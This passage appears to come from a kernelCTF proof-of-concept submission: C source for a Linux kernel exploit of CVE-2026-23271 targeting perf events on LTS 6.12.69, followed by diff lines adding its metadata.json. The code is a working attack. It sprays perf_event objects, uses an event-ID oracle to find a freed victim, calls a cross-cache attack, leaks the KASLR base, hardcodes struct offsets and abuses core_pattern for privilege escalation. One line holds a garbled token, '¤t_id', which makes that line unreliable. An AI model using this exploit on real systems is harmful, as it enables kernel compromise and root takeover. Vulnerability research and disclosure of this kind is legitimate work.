            __atomic_store_n(&tp_fail_reason, TP_FAIL_FINAL_FAILED, __ATOMIC_RELEASE);
        exit(1);
    }

    exit(0);
}

/*
 * Thread entry: wait for the spray thread's verdict on sync_pipe, work out
 * which spray_b fd has become the victim, then call cross_cache_attack().
 *
 * Flow:
 *   1. Pin to CPU 0 and block on a one-byte read from sync_pipe[0].
 *      Anything other than 'C' (or a read error) sets exit_threads and
 *      stop_threads, records TP_FAIL_WARN_MISS and returns NULL.
 *   2. Wait (bounded by TP_SPRAY_DONE_WAIT_NS) for tp_spray_open_done to
 *      reach SPRAY_B_COUNT.
 *   3. Record a baseline PERF_EVENT_IOC_ID value for each spray_b fd.
 *   4. For up to TP_ORACLE_PASSES passes, open probe events one at a time and
 *      after each one re-read every baseline ID; the first spray_b fd whose
 *      ID no longer matches its baseline becomes the victim.
 *   5. If none is found, record TP_FAIL_ORACLE_NO_VICTIM and exit(1);
 *      otherwise call cross_cache_attack(), which exits the process itself.
 *
 * `arg` is unused.
 */
void *locate_victim_event(void *arg)
{
    bind_to_cpu(0);

    struct perf_event_attr spray_attr;
    memset(&spray_attr, 0, sizeof(spray_attr));
    spray_attr.type = PERF_TYPE_SOFTWARE;
    spray_attr.size = sizeof(struct perf_event_attr);
    spray_attr.config = PERF_COUNT_SW_CPU_CLOCK;
    spray_attr.disabled = 1;
    spray_attr.exclude_kernel = 1;

    for(int i = 0; i < SPRAY_C_COUNT; i++) {
        spray_c_fds[i] = -1;
    }

    // NOTE(review): only a negative return is treated as failure; a 0-byte
    // read (EOF) would leave `sync` unset before the comparison below -- confirm
    // whether that can happen with this pipe.
    char sync;
    if (read(sync_pipe[0], &sync, 1) < 0) {
        log_warn("read sync_pipe failed");
        exit_threads = 1;
        stop_threads = 1;
        __atomic_store_n(&tp_fail_reason, TP_FAIL_WARN_MISS, __ATOMIC_RELEASE);
        return NULL;
    }
    // The spray thread writes "C" after releasing its gate and "F" when the
    // gate never opened.
    if (sync != 'C') {
        log_warn("[Main] WARN not hit, skip spray/locate flow");
        exit_threads = 1;
        stop_threads = 1;
        __atomic_store_n(&tp_fail_reason, TP_FAIL_WARN_MISS, __ATOMIC_RELEASE);
        return NULL;
    }

    __atomic_store_n(&tp_warn_hit, 1, __ATOMIC_RELEASE);
    __atomic_store_n(&tp_race_success, 1, __ATOMIC_RELEASE);

    log_dbg("[Main] Waiting for spray_b completion...");
    {
        // Poll every 1 ms until all spray opens are reported or the timeout hits.
        uint64_t spray_wait_start = get_time_ns();
        while (__atomic_load_n(&tp_spray_open_done, __ATOMIC_ACQUIRE) < SPRAY_B_COUNT &&
               (get_time_ns() - spray_wait_start) < TP_SPRAY_DONE_WAIT_NS) {
            usleep(1000);
        }
        log_dbg("spray_b done: %d/%d", __atomic_load_n(&tp_spray_open_done, __ATOMIC_ACQUIRE), SPRAY_B_COUNT);
    }

    // Baseline: remember the current ID of each spray_b event. Entries that
    // have no fd yet, fail the ioctl or report ID 0 are retried on the next
    // sweep, until TP_BASELINE_MIN_VALID_IDS are collected or
    // TP_BASELINE_WAIT_NS elapses.
    memset(spray_b_id_valid, 0, sizeof(spray_b_id_valid));
    {
        int valid_ids = 0;
        uint64_t start_ns = get_time_ns();

        while (valid_ids < TP_BASELINE_MIN_VALID_IDS &&
               (get_time_ns() - start_ns) < TP_BASELINE_WAIT_NS) {
            for (int i = 0; i < SPRAY_B_COUNT; i++) {
                uint64_t id_val = 0;
                int fd;

                if (spray_b_id_valid[i])
                    continue;

                fd = spray_b_fds[i];
                if (fd < 0)
                    continue;
                if (ioctl(fd, PERF_EVENT_IOC_ID, &id_val) != 0)
                    continue;
                if (id_val == 0)
                    continue;

                spray_b_ids[i] = id_val;
                spray_b_id_valid[i] = 1;
                valid_ids++;
            }
            if (valid_ids >= TP_BASELINE_MIN_VALID_IDS)
                break;
            usleep(TP_BASELINE_POLL_US);
        }
        log_dbg("spray baseline ready: valid_ids=%d/%d", valid_ids, SPRAY_B_COUNT);
    }

    // Close four entries of drain_fds starting at index DRAIN_COUNT, then
    // wait for an RCU grace period before probing.
    for (int i = DRAIN_COUNT; i < DRAIN_COUNT + 4; i++) {
        close(drain_fds[i]);
        drain_fds[i] = -1;
    }

    user_synchronize_rcu();

    for (int pass = 0; pass < TP_ORACLE_PASSES && victim_perf_fd == -1; pass++) {
        spray_c_count = 0;
        log_dbg("oracle pass %d/%d", pass + 1, TP_ORACLE_PASSES);
        for (int k = 0; k < SPRAY_C_COUNT; k++) {
            int tmp_probe_fd = perf_event_open(&spray_attr, 0, -1, -1, 0);
            if (tmp_probe_fd < 0)
                break;
            spray_c_fds[spray_c_count] = tmp_probe_fd;

            // The probe's own ID is fetched but not used afterwards.
            uint64_t tmp_probe_id;
            ioctl(tmp_probe_fd, PERF_EVENT_IOC_ID, &tmp_probe_id);
            // Re-read every baselined spray_b ID; a changed ID marks the victim.
            for (int i = 0; i < SPRAY_B_COUNT; i++) {
                if (spray_b_fds[i] == -1 || !spray_b_id_valid[i])
                    continue;

                // NOTE(review): `¤t_id` below looks like an HTML-entity
                // mangling of `&current_id` from text extraction -- confirm
                // against the original file.
                uint64_t current_id;
                if (ioctl(spray_b_fds[i], PERF_EVENT_IOC_ID, ¤t_id) == 0) {
                    if (current_id != spray_b_ids[i]) {
                        victim_perf_fd = spray_b_fds[i];
                        victim_perf_idx = i;
                        victim_perf_id = current_id;

                        log_info("FOUND VICTIM! Index: %d, FD: %d, overwrite by FD: %d", victim_perf_idx, victim_perf_fd, tmp_probe_fd);
                        log_info("Original ID: %lu, Victim Event ID : %lu", spray_b_ids[victim_perf_idx], victim_perf_id);

                        break;
                    }
                }
            }

            // On a hit, spray_c_count is left pointing at the probe that
            // triggered it; cross_cache_attack() closes spray_c_fds[spray_c_count].
            if (victim_perf_fd != -1)
                break;
            spray_c_count += 1;
        }

        if (victim_perf_fd != -1)
            break;

        // Pass failed: close this pass's probes, wait for RCU, pause, retry.
        for (int idx = 0; idx <= spray_c_count && idx < SPRAY_C_COUNT; idx++) {
            if (spray_c_fds[idx] != -1) {
                close(spray_c_fds[idx]);
                spray_c_fds[idx] = -1;
            }
        }
        spray_c_count = 0;
        user_synchronize_rcu();
        usleep(TP_ORACLE_PASS_GAP_US);
    }

    if (victim_perf_fd == -1 || victim_perf_idx == -1) {
        log_warn("Failed to locate victim perf event!");
        __atomic_store_n(&tp_fail_reason, TP_FAIL_ORACLE_NO_VICTIM, __ATOMIC_RELEASE);
        exit_threads = 1;
        stop_threads = 1;
        exit(1);
    }
    cross_cache_attack();

    // cross_cache_attack() ends in exit() on every path shown in this file, so
    // the lines below are not expected to run.
    sleep(10000);
    return NULL;
}

/*
 * Program entry point.
 *
 * Command line:
 *   --vuln-trigger   (any position) skip target detection and the KASLR
 *                    step and use the default ktext value.
 *   <digit...>       when the first argument starts with a decimal digit and
 *                    --vuln-trigger is absent, core_pattern_handler(argv) is
 *                    called first.
 *                    (presumably the path taken when the kernel launches this
 *                    binary as the core_pattern helper -- confirm against
 *                    core_pattern_handler().)
 *
 * Returns 1 if a thread cannot be created or tp_race_success was never set,
 * 0 otherwise.
 */
int main(int argc, char *argv[])
{
    setbuf(stdout, NULL);

    for (int i = 1; i < argc; i++) {
        if (strcmp(argv[i], "--vuln-trigger") == 0)
            vuln_trigger_mode = 1;
    }

    if (argc > 1 && !vuln_trigger_mode && argv[1][0] >= '0' && argv[1][0] <= '9') {
        core_pattern_handler(argv);
    }

    // Raise the open-file limit to 0xf000; the result of setrlimit() is not checked.
    struct rlimit rlim = {
        .rlim_cur = 0xf000,
        .rlim_max = 0xf000
    };
    setrlimit(RLIMIT_NOFILE, &rlim);

    // Reset all status words before any thread starts.
    __atomic_store_n(&tp_warn_hit, 0, __ATOMIC_RELEASE);
    __atomic_store_n(&tp_race_success, 0, __ATOMIC_RELEASE);
    __atomic_store_n(&tp_oracle_hit, 0, __ATOMIC_RELEASE);
    __atomic_store_n(&tp_victim_msg_idx, -1, __ATOMIC_RELEASE);
    __atomic_store_n(&tp_final_stage_entered, 0, __ATOMIC_RELEASE);
    __atomic_store_n(&tp_final_result, 0, __ATOMIC_RELEASE);
    __atomic_store_n(&tp_fail_reason, TP_FAIL_NONE, __ATOMIC_RELEASE);

    g_num_cpus = sysconf(_SC_NPROCESSORS_ONLN);
    g_event_id = TP_FIXED_EVENT_ID;

    pthread_t t1, t2, t3, t4, t5;
    atexit(cleanup_resources);
/* main(), continued: pipe + membarrier setup, target description, ktext
 * resolution, crash child, thread start-up and join. */

    // The pipe() result is deliberately discarded (empty statement body).
    if(pipe(sync_pipe)){};

    // Registration failure is reported but is not fatal.
    if (syscall(__NR_membarrier, MEMBARRIER_CMD_REGISTER_PRIVATE_EXPEDITED, 0, 0) < 0) {
        perror("membarrier register failed (kernel might be too old or CONFIG_MEMBARRIER is off)");
    }

    if (!vuln_trigger_mode) {
        TargetDb kxdb("target_db.kxdb", target_db);

        // Describe the one supported target by hand: the struct field offsets
        // and sizes and the symbol offset that the rest of the file looks up
        // through g_target.
        Target st("kernelctf", "lts-6.12.69");
        st.AddStruct("perf_event", 0x520, {
            {"pmu", 0x098, 8},
            {"state", 0x0a8, 4},
            {"attach_state", 0x0ac, 4},
            {"ctx", 0x228, 8},
            {"refcount", 0x238, 4},
            {"parent", 0x280, 8},
            {"rb", 0x2d0, 8},
            {"addr_filters", 0x3a0, 8},
            {"destroy", 0x3b8, 8},
            {"id", 0x3d8, 8},
            {"clock", 0x3e8, 8},
            {"prog", 0x400, 8},
            {"cgrp", 0x4f8, 8}
        });
        st.AddStruct("pmu", 0x90, {
            {"nr_addr_filters", 0x6c, 4},
            {"event_mapped", 0x88, 8}
        });
        st.AddSymbol("core_pattern", 0x3611300);
        kxdb.AddTarget(st);

        // `static` keeps the detected target alive after this block, since
        // g_target stores its address.
        static auto detected_target = kxdb.AutoDetectTarget();
        g_target = &detected_target;
        printf("[+] Running on target: %s %s\n",
               detected_target.GetDistro().c_str(), detected_target.GetReleaseName().c_str());
    }

    if (vuln_trigger_mode) {
        ktext = 0xffffffff81000000;
        log_dbg("--vuln-trigger: skipping KASLR bypass, using default ktext=0x%lx", (unsigned long)ktext);
    } else {
        // Reuse a value cached in /tmp/ktext by an earlier run when present.
        FILE *f_ktext = fopen("/tmp/ktext", "r");
        if (f_ktext) {
            if (fscanf(f_ktext, "%lx", &ktext) == 1) {
                log_dbg("Loaded ktext from cache: 0x%lx", (unsigned long)ktext);
            }
            fclose(f_ktext);
        }
        // No cached value: obtain one, or fall back to the fixed default when
        // built with KASLR_FIXED.
        if (!ktext) {
#ifndef KASLR_FIXED
            ktext = leak_kaslr_base_local(/* window_size = */ 11,
                                          /* samples = */ 100,
                                          /* trials = */ 9);
            log_dbg("leak_kaslr_base_local returned ktext=0x%lx",
                    (unsigned long)ktext);
#else
            ktext = 0xffffffff81000000;
#endif
        }
        // Write the value back to the cache file (also rewrites it when it was
        // just loaded from there).
        if (ktext) {
            f_ktext = fopen("/tmp/ktext", "w");
            if (f_ktext) {
                fprintf(f_ktext, "%lx", (unsigned long)ktext);
                fclose(f_ktext);
            }
        }
    }

    log_dbg("Assign ktext to 0x%lx", (unsigned long)ktext);

    log_info("forking process for core_pattern exp later");
    // The fork() result is not checked for -1.
    crash_child_pid = fork();
    if (crash_child_pid == 0) {
        // Child: pin to CPU 1 and run crash().
        bind_to_cpu(1);
        log_info("Fork crash child pid is %d", getpid());
        crash();
    }

    setup_msg_queues();


    // Start the five cooperating threads; failure to create any of them is fatal.
    if (pthread_create(&t1, NULL, tp_worker_thread, NULL)) {
        perror("pthread_create worker");
        return 1;
    }
    if (pthread_create(&t2, NULL, tp_control_thread, NULL)) {
        perror("pthread_create control");
        return 1;
    }
    if (pthread_create(&t3, NULL, tp_closer_thread, NULL)) {
        perror("pthread_create closer");
        return 1;
    }

    if (pthread_create(&t4, NULL, sprayer_thread, NULL)) {
        perror("pthread_create sprayer");
        return 1;
    }

    if (pthread_create(&t5, NULL, locate_victim_event, NULL)) {
        perror("pthread_create locator");
        return 1;
    }

    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    pthread_join(t3, NULL);
    pthread_join(t4, NULL);
    pthread_join(t5, NULL);


    // Reached only if no thread ended the process via exit() first.
    if (!__atomic_load_n(&tp_race_success, __ATOMIC_ACQUIRE))
        return 1;

    return 0;
}

diff --git a/pocs/linux/kernelctf/CVE-2026-23271_lts/exploit/lts-6.12.69/target_db.kxdb b/pocs/linux/kernelctf/CVE-2026-23271_lts/exploit/lts-6.12.69/target_db.kxdb new file mode 100644 index 000000000..b47d2547a Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23271_lts/exploit/lts-6.12.69/target_db.kxdb differ diff --git a/pocs/linux/kernelctf/CVE-2026-23271_lts/metadata.json b/pocs/linux/kernelctf/CVE-2026-23271_lts/metadata.json new file mode 100644 index 000000000..b744119e7 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23271_lts/metadata.json @@ -0,0 +1,26 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": ["exp452"], + "vulnerability": { + "cve": "CVE-2026-23271", + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c9bc1753b3cc41d0e01fbca7f035258b5f4db0ae", + "affected_versions": [ + "2.6.31-rc1 - 7.0-rc2" + ], + "requirements": { + "attack_surface": [], + "capabilities": [], + "kernel_config": [ + "CONFIG_PERF_EVENTS" + ]
+ } + }, + "exploits": { + "lts-6.12.69": { + "environment": "lts-6.12.69", + "uses": [], + "requires_separate_kaslr_leak": false, + "stability_notes": "20% success rate" + } + } +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2026-23271_lts/original.tar.gz b/pocs/linux/kernelctf/CVE-2026-23271_lts/original.tar.gz new file mode 100644 index 000000000..539eec38b Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23271_lts/original.tar.gz differ